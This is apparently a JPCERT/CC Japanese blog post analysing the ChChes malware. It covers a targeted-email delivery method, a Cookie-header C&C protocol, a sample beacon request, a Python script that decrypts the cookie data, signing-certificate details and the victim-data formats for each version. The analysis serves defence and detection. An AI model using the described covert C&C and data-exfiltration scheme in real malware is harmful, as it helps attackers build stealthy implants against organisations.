Home > ラーニング > ライブラリ > 分析センターだより > Cookieヘッダーを用いてC&CサーバとやりとりするマルウエアChChes(2017-01-26)
JPCERT/CCでは、2016年10月頃から国内の組織に対して、実行ファイルを含むZIPファイルを添付した標的型メールが送信されていることを確認しています。標的型メールは、実在の人物を騙り、国内のフリーメールアドレスから送信されています。また、実行ファイルはWord文書にアイコン偽装されており、これを実行するとChChesと呼ばれるマルウエアに感染します。
今回はChChesの通信内容の特徴などについて紹介します。
標的型メールに添付されているZIPファイル標的型メールに添付されているZIPファイルには、実行ファイルのみが含まれる場合と、加えてダミーのWord文書を同梱している場合があります。以下は、後者の例です。
上記の事例では、類似したファイル名が2つ並び、片方はダミーのWord文書、もう片方はWord文書のアイコンに偽装した実行ファイルとなっており、この実行ファイルを実行することでChChesに感染します。実行ファイルには特定のコードサイニング証明書により署名されている検体を複数確認しています。なお、ダミーのWord文書は無害なもので、ファイル名に関連した実在するオンライン記事の内容が、Word文書化されています。コードサイニング証明書の詳細はAppendix Aに記載しています。
ChChesの通信内容についてChChesは、特定のサイトとHTTPで通信を行い、コマンドおよびモジュールを受信するマルウエアです。ChChesは、単体では実行できる機能はほとんどなく、C&Cサーバと通信する中でモジュールを受信し、メモリ上に展開することで機能を拡張します。
以下はChChesが送信するHTTP GETリクエストの例です。なお、GETではなくHEADが使われる場合もあります。
GET /X4iBJjp/MtD1xyoJMQ.htm HTTP/1.1 Cookie: uHa5=kXFGd3JqQHMfnMbi9mFZAJHCGja0ZLs%3D;KQ=yt%2Fe~省略~ Accept: */* Accept-Encoding: gzip, deflate User-Agent: [ユーザエージェント] Host: [ホスト名] Connection: Keep-Alive Cache-Control: no-cache
上記のように、HTTPリクエストのパスには/[ランダムな文字列].htmが使われますが、Cookieフィールドの値はランダムではなく、C&Cサーバとのやりとりに使われるデータが暗号化された状態で含まれています。この値は、以下のPythonスクリプトで復号することができます。
data_list = cookie_data.split(';') dec = [] for i in range(len(data_list)): tmp = data_list[i] pos = tmp.find("=") key = tmp[0:pos] val = tmp[pos:] md5 = hashlib.md5() md5.update(key) rc4key = md5.hexdigest()[8:24] rc4 = ARC4.new(rc4key) dec.append(rc4.decrypt(val.decode("base64"))[len(key):]) print("[*] decoded: " + "".join(dec))
以下は、感染後に発生する通信の大まかな流れです。
最初のリクエストChChesが最初に送信するHTTPリクエスト(リクエスト1)のCookieフィールドの値には'A'で始まるデータが暗号化された状態で含まれています。以下は、送信されるデータの例です。
図 3に示すように、送信されるデータにはコンピュータ名などの情報が含まれます。なお、暗号化されたデータのフォーマットはChChesのバージョンにより異なります。詳細についてはAppendix Bに記載します。
ChChesは、リクエスト1のレスポンスとして、感染端末を識別するIDとなる文字列をC&Cサーバから受信します(レスポンス1)。このとき、感染端末を識別するIDは以下のようにSet-Cookieフィールドの値に含まれます。
モジュールおよびコマンドの要求次に、ChChes は、モジュールおよびコマンドを受信するためのHTTPリクエスト(リクエスト2)を送信します。このとき、Cookieフィールドの値には'B'で始まる以下のデータが暗号化された状態で含まれています。
B[感染端末を識別するID]
リクエスト2のレスポンスとして、暗号化された状態のモジュールおよびコマンド(レスポンス2)をC&Cサーバから受信します。以下は受信したモジュールおよびコマンドの復号後の例です。
上記のように、コマンドとモジュールが1つのデータとして受信する場合と、コマンドのみを受信する場合があります。以降、受信したコマンドの実行結果がC&Cサーバに送信され、再びモジュールおよびコマンドを受信する処理に戻ります。このようにして、C&Cサーバから繰り返し命令を受信することで、感染端末は外部からの遠隔操作を受けることになります。
JPCERT/CCの調査では、これまでに、以下の機能を持ったモジュールの存在を確認しており、これが実質的にはChChesのボット機能であると言えます。
特に、AESによる通信の暗号化を行うモジュールは、感染後、比較的初期の段階で受信されることを確認しています。これにより、その後のC&Cサーバとのやりとりは、これまでの通信の暗号化に加えて、AESで暗号化されることになります。
おわりに
ChChesは、2016年10月頃から確認されるようになった比較的新しい種類のマルウエアです。今後も標的型攻撃で使われる可能性があるため、JPCERT/CCでは引き続き、ChChes とそれを利用した標的型攻撃に注目していきます。
今回解説した検体のハッシュ値に関しては、Appendix Cに記載しています。また、これまでにJPCERT/CCで確認しているChChesの通信先Appendix Dに記載していますので、このような通信先にアクセスしている端末がないかご確認ください。
検体に付加されているコードサイニング証明書の情報は以下の通りです。
$ openssl x509 -inform der -text -in mal.cer Certificate: Data: Version: 3 (0x2) Serial Number: 3f:fc:eb:a8:3f:e0:0f:ef:97:f6:3c:d9:2e:77:eb:b9 Signature Algorithm: sha1WithRSAEncryption Issuer: C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA Validity Not Before: Aug 5 00:00:00 2011 GMT Not After : Aug 4 23:59:59 2012 GMT Subject: C=IT, ST=Italy, L=Milan, O=HT Srl, OU=Digital ID Class 3 - Microsoft Software Validation v2, CN=HT Srl Subject Public Key Info: ~省略~
以下は、これまでに確認しているChChesのバージョン番号と検体のPEヘッダから取得したコンパイルタイムをプロットしたものです。
以下は、ChChesのバージョン毎の最初のHTTPリクエストに含まれる暗号化されたデータのフォーマットと各値の説明です。
バージョン | 送信フォーマット |
---|---|
1.0.0 | A<a>*<b>?3618468394?<c>?<d>*<f> |
1.2.2 | A<a>*<b>?3618468394?<c>?<d>*<f> |
1.3.0 | A<a>*<b>?3618468394?<c>?<d>*<f> |
1.3.2 | A<a>*<b>?3618468394?<c>?<d>*<g> |
1.4.0 | A<a>*<b>?3618468394?<c>?<d>*<g> |
1.4.1 | A<a>*<b>?3618468394?<c>?<d> (<e>)*<g> |
1.6.4 | A<a>*<b>*<h>?3618468394?<c>?<d> (<e>)*<g> |
記号 | データ | サイズ | 備考 |
---|---|---|---|
<a> | コンピュータ名 | 可変 | 英数大文字 |
<b> | プロセスID | 可変 | |
<c> | テンポラリフォルダのパス | 可変 | %TEMP%の値 |
<d> | マルウエアのバージョン | 可変 | 例:1.4.1 |
<e> | 画面の解像度 | 可変 | 例:1024x768 |
<f> | explorer.exeのバージョン | 可変 | 例:6.1.7601.17567 |
<g> | kernel32.dllのバージョン | 可変 | 例:6.1.7601.17514 |
<h> | SIDのMD5値の一部 | 16バイト | 例:0345cb0454ab14d7 |
ChChes
・分析センターだより「Cookieヘッダーを用いてC&CサーバとやりとりするマルウエアChChes(2017-01-26)」
・分析センターだより「Poison Ivyのコードを取り込んだマルウエアPlugX(2017-01-12)」
・分析センターだより「騙せるPE解析ツールのImport API表示機能(2016-11-28)」
・分析センターだより「既知のマルウエアをメモリイメージから簡易に検知できるツールを開発 ~impfuzzy for Volatility~(2016-11-01)」